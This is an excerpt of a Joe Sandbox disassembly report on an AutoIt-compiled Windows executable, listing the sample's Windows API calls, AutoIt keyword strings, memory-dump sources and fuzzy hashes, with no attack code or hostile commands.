  • Part of subcall function 00F6A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F6A9C5
  • Part of subcall function 00F6A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F6A9ED
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
APIs
• DestroyWindow.USER32(?,?,?), ref: 00EE2CA2
• DeleteObject.GDI32(00000000), ref: 00EE2CE8
• DeleteObject.GDI32(00000000), ref: 00EE2CF3
• DestroyIcon.USER32(00000000,?,?,?), ref: 00EE2CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 00EE2D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00F1C43B
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F1C474
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F1C89D
  • Part of subcall function 00EE1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EE2036,?,00000000,?,?,?,?,00EE16CB,00000000,?), ref: 00EE1B9A
• SendMessageW.USER32(?,00001053), ref: 00F1C8DA
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F1C8F1
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F1C907
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F1C912
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
• String ID: 0
• API String ID: 464785882-4108050209
APIs
• DestroyWindow.USER32(00000000), ref: 00F574DE
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F5759D
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F575DB
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F575ED
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F57633
• GetClientRect.USER32(00000000,?), ref: 00F5763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F57683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F57692
• GetStockObject.GDI32(00000011), ref: 00F576A2
• SelectObject.GDI32(00000000,00000000), ref: 00F576A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F576B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F576BF
• DeleteDC.GDI32(00000000), ref: 00F576C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F576F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 00F5770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F57746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F5775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00F5776B
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F5779B
• GetStockObject.GDI32(00000011), ref: 00F577A6
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F577B1
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F577BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F4AD1E
• GetDriveTypeW.KERNEL32(?,00F6FAC0,?,\\.\,00F6F910), ref: 00F4ADFB
• SetErrorMode.KERNEL32(00000000,00F6FAC0,?,\\.\,00F6F910), ref: 00F4AF59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
                                                                                                                            • Opcode ID: 69fe56c0bf05b700a446856fbfe46a6b7b93232ebca2666dbf424907a7a64b90
                                                                                                                            • Instruction ID: 8b50f3d956997021bc12f9f71cfcca32e64417ef6df666b8e1ca95212e3f9526
                                                                                                                            • Opcode Fuzzy Hash: 69fe56c0bf05b700a446856fbfe46a6b7b93232ebca2666dbf424907a7a64b90
                                                                                                                            • Instruction Fuzzy Hash: 6D8129B1A002496ACF10AF61EC43FEE37A8AF25754F045025FC05BA1D6EB75DE45F251
APIs
• GetSysColor.USER32(00000012), ref: 00F6A903
• SetTextColor.GDI32(?,?), ref: 00F6A907
• GetSysColorBrush.USER32(0000000F), ref: 00F6A91D
• GetSysColor.USER32(0000000F), ref: 00F6A928
• CreateSolidBrush.GDI32(?), ref: 00F6A92D
• GetSysColor.USER32(00000011), ref: 00F6A945
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F6A953
• SelectObject.GDI32(?,00000000), ref: 00F6A964
• SetBkColor.GDI32(?,00000000), ref: 00F6A96D
• SelectObject.GDI32(?,?), ref: 00F6A97A
• InflateRect.USER32(?,000000FF,000000FF), ref: 00F6A999
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F6A9B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 00F6A9C5
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F6A9ED
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F6AA14
• InflateRect.USER32(?,000000FD,000000FD), ref: 00F6AA32
• DrawFocusRect.USER32(?,?), ref: 00F6AA3D
• GetSysColor.USER32(00000011), ref: 00F6AA4B
• SetTextColor.GDI32(?,00000000), ref: 00F6AA53
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F6AA67
• SelectObject.GDI32(?,00F6A5FA), ref: 00F6AA7E
• DeleteObject.GDI32(?), ref: 00F6AA89
• SelectObject.GDI32(?,?), ref: 00F6AA8F
• DeleteObject.GDI32(?), ref: 00F6AA94
• SetTextColor.GDI32(?,?), ref: 00F6AA9A
• SetBkColor.GDI32(?,?), ref: 00F6AAA4
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 00915581046571408aee373aaa95f88d36e25984f270d0b776e7cb5587991881
• Instruction ID: c1262ec7e41ca251033bb7b71f6351862877ba5554e595e78b75f82e45b0de6b
• Opcode Fuzzy Hash: 00915581046571408aee373aaa95f88d36e25984f270d0b776e7cb5587991881
• Instruction Fuzzy Hash: 34513E71900208FFDB109FA4ED48EAE7B79EF09320F254125F921AB2A1D7B59D44EF50
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F68AC1
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F68AD2
• CharNextW.USER32(0000014E), ref: 00F68B01
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F68B42
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F68B58
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F68B69
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F68B86
• SetWindowTextW.USER32(?,0000014E), ref: 00F68BD8
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F68BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00F68C1F
• _memset.LIBCMT ref: 00F68C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F68C8D
• _memset.LIBCMT ref: 00F68CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F68D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00F68D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 00F68E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00F68E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F68E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F68EB4
• DrawMenuBar.USER32(?), ref: 00F68EC3
• SetWindowTextW.USER32(?,0000014E), ref: 00F68EEB
Strings
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
• Opcode ID: 3e0f7284c4566d7d9190cf0aee54b575acb33f9b80c3dafd4e7f987a69abfb68
• Instruction ID: 5fe28f083cd27946c2fafd954f76f1d6b948668b22c7a35ab3571a0a5f6328bd
• Opcode Fuzzy Hash: 3e0f7284c4566d7d9190cf0aee54b575acb33f9b80c3dafd4e7f987a69abfb68
• Instruction Fuzzy Hash: 47E17271900219AFDF20DF50CC84EEE7B79EF09760F10825AF925AA191DB758985FF60
APIs
• GetCursorPos.USER32(?), ref: 00F649CA
• GetDesktopWindow.USER32 ref: 00F649DF
• GetWindowRect.USER32(00000000), ref: 00F649E6
• GetWindowLongW.USER32(?,000000F0), ref: 00F64A48
• DestroyWindow.USER32(?), ref: 00F64A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F64A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F64ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F64AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00F64AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F64B09
• IsWindowVisible.USER32(?), ref: 00F64B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F64B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F64B58
• GetWindowRect.USER32(?,?), ref: 00F64B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 00F64B96
• GetMonitorInfoW.USER32(00000000,?), ref: 00F64BB0
• CopyRect.USER32(?,?), ref: 00F64BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 00F64C32
Strings
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 6a2ccf31c8578afac8845c1e2b803c157a4e7e9e7123dcbd841c274570aa7e80
• Instruction ID: 0f067b36ce1a6fe5bdddd9401ae7e0eb6b2489a92568441c0f110b6c9619738e
• Opcode Fuzzy Hash: 6a2ccf31c8578afac8845c1e2b803c157a4e7e9e7123dcbd841c274570aa7e80
• Instruction Fuzzy Hash: 6AB1AD71608340AFDB04EF65D844B6ABBE4FF88310F008A1CF999AB2A1D775EC05DB95
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EE28BC
• GetSystemMetrics.USER32(00000007), ref: 00EE28C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EE28EF
• GetSystemMetrics.USER32(00000008), ref: 00EE28F7
• GetSystemMetrics.USER32(00000004), ref: 00EE291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EE2939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00EE2949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EE297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EE2990
• GetClientRect.USER32(00000000,000000FF), ref: 00EE29AE
• GetStockObject.GDI32(00000011), ref: 00EE29CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00EE29D5
  • Part of subcall function 00EE2344: GetCursorPos.USER32(?), ref: 00EE2357
  • Part of subcall function 00EE2344: ScreenToClient.USER32(00FA57B0,?), ref: 00EE2374
  • Part of subcall function 00EE2344: GetAsyncKeyState.USER32(00000001), ref: 00EE2399
  • Part of subcall function 00EE2344: GetAsyncKeyState.USER32(00000002), ref: 00EE23A7
• SetTimer.USER32(00000000,00000000,00000028,00EE1256), ref: 00EE29FC
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: f64a5a16e78c748c8136fa05a9943d3d14738c839f71a365e09d40afe424e166
• Instruction ID: 959581e89b4a1a26d32180b3a1c5b25e4bef3d2dde4acc851b46ebddd77abac5
• Opcode Fuzzy Hash: f64a5a16e78c748c8136fa05a9943d3d14738c839f71a365e09d40afe424e166
• Instruction Fuzzy Hash: ACB14B71A4024EEFDB14DFA9DC45BED7BA8FB08714F105229FA16E7290DB749840EB50
APIs
• CharUpperBuffW.USER32(?,?), ref: 00F63E6F
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F63F2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00F3A47A
• __swprintf.LIBCMT ref: 00F3A51B
• _wcscmp.LIBCMT ref: 00F3A52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F3A583
• _wcscmp.LIBCMT ref: 00F3A5BF
• GetClassNameW.USER32(?,?,00000400), ref: 00F3A5F6
• GetDlgCtrlID.USER32(?), ref: 00F3A648
• GetWindowRect.USER32(?,?), ref: 00F3A67E
• GetParent.USER32(?), ref: 00F3A69C
• ScreenToClient.USER32(00000000), ref: 00F3A6A3
• GetClassNameW.USER32(?,?,00000100), ref: 00F3A71D
• _wcscmp.LIBCMT ref: 00F3A731
• GetWindowTextW.USER32(?,?,00000400), ref: 00F3A757
• _wcscmp.LIBCMT ref: 00F3A76B
  • Part of subcall function 00F0362C: _iswctype.LIBCMT ref: 00F03634
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 00F3AF18
• _wcscmp.LIBCMT ref: 00F3AF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 00F3AF51
• CharUpperBuffW.USER32(?,00000000), ref: 00F3AF6E
• _wcscmp.LIBCMT ref: 00F3AF8C
• _wcsstr.LIBCMT ref: 00F3AF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 00F3AFD5
• _wcscmp.LIBCMT ref: 00F3AFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 00F3B00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 00F3B055
• _wcscmp.LIBCMT ref: 00F3B065
• GetClassNameW.USER32(00000010,?,00000400), ref: 00F3B08D
• GetWindowRect.USER32(00000004,?), ref: 00F3B0F6
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00F55013
• LoadCursorW.USER32(00000000,00007F00), ref: 00F5501E
• LoadCursorW.USER32(00000000,00007F03), ref: 00F55029
• LoadCursorW.USER32(00000000,00007F8B), ref: 00F55034
• LoadCursorW.USER32(00000000,00007F01), ref: 00F5503F
• LoadCursorW.USER32(00000000,00007F81), ref: 00F5504A
• LoadCursorW.USER32(00000000,00007F88), ref: 00F55055
• LoadCursorW.USER32(00000000,00007F80), ref: 00F55060
• LoadCursorW.USER32(00000000,00007F86), ref: 00F5506B
• LoadCursorW.USER32(00000000,00007F83), ref: 00F55076
• LoadCursorW.USER32(00000000,00007F85), ref: 00F55081
• LoadCursorW.USER32(00000000,00007F82), ref: 00F5508C
• LoadCursorW.USER32(00000000,00007F84), ref: 00F55097
• LoadCursorW.USER32(00000000,00007F04), ref: 00F550A2
• LoadCursorW.USER32(00000000,00007F02), ref: 00F550AD
• LoadCursorW.USER32(00000000,00007F89), ref: 00F550B8
• GetCursorInfo.USER32(?), ref: 00F550C8
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
APIs
• _memset.LIBCMT ref: 00F6A259
• DestroyWindow.USER32(?,?), ref: 00F6A2D3
  • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F6A34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F6A36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F6A382
• DestroyWindow.USER32(00000000), ref: 00F6A3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EE0000,00000000), ref: 00F6A3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F6A3F4
• GetDesktopWindow.USER32 ref: 00F6A40D
• GetWindowRect.USER32(00000000), ref: 00F6A414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F6A42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F6A444
  • Part of subcall function 00EE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EE25EC
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
APIs
  • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
• DragQueryPoint.SHELL32(?,?), ref: 00F6C627
  • Part of subcall function 00F6AB37: ClientToScreen.USER32(?,?), ref: 00F6AB60
  • Part of subcall function 00F6AB37: GetWindowRect.USER32(?,?), ref: 00F6ABD6
  • Part of subcall function 00F6AB37: PtInRect.USER32(?,?,00F6C014), ref: 00F6ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 00F6C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F6C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F6C6BE
• _wcscat.LIBCMT ref: 00F6C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F6C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 00F6C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 00F6C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 00F6C757
• DragFinish.SHELL32(?), ref: 00F6C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F6C851
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: 68d4cda0fe89581d8fa805d76c253158c6b018cf5cc648428ce56232606a934f
• Instruction ID: 0d039a92246cc2de93949354fd69d8c06e6bb02b0999883ebceb64fa0a2ce530
• Opcode Fuzzy Hash: 68d4cda0fe89581d8fa805d76c253158c6b018cf5cc648428ce56232606a934f
• Instruction Fuzzy Hash: 49619C71508344AFC701EF64DC85DAFBBE8EF89750F00092EF5A5921B1DB719909DB92
APIs
• CharUpperBuffW.USER32(?,?), ref: 00F64424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F6446F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 72fc78a877439c08434a0a518b3f2232dde145f8764cb545ca0a9c08a6ff42ff
• Instruction ID: 733fd124609a961a0e4fb942c0cd2cefe83ddca271cfa1594056c0734ec4e49f
• Opcode Fuzzy Hash: 72fc78a877439c08434a0a518b3f2232dde145f8764cb545ca0a9c08a6ff42ff
• Instruction Fuzzy Hash: B6916B712043419BCB04FF10C852A6EB7E1AF95364F05886CF8966B3A3CB75ED49EB91
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F6B8B4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F66B11,?), ref: 00F6B910
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F6B949
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F6B98C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F6B9C3
• FreeLibrary.KERNEL32(?), ref: 00F6B9CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F6B9DF
• DestroyIcon.USER32(?), ref: 00F6B9EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F6BA0B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F6BA17
  • Part of subcall function 00F02EFD: __wcsicmp_l.LIBCMT ref: 00F02F86
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: 11cf5b51d5e14532814f8e1a93d1579bfe8ec9228334b1476026fa357e44218a
• Instruction ID: 4eedf3a428771ce1809a2567228e7bf0c546276a4e157dfce73cf1180cfcfa0d
• Opcode Fuzzy Hash: 11cf5b51d5e14532814f8e1a93d1579bfe8ec9228334b1476026fa357e44218a
• Instruction Fuzzy Hash: C661DE71A40219BAEB14DF64DC45FBE7BA8FB08720F10411AFA15D61D1DBB49A81FBA0
APIs
• GetLocalTime.KERNEL32(?), ref: 00F4DCDC
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00F4DCEC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F4DCF8
• __wsplitpath.LIBCMT ref: 00F4DD56
• _wcscat.LIBCMT ref: 00F4DD6E
• _wcscat.LIBCMT ref: 00F4DD80
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F4DD95
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DDA9
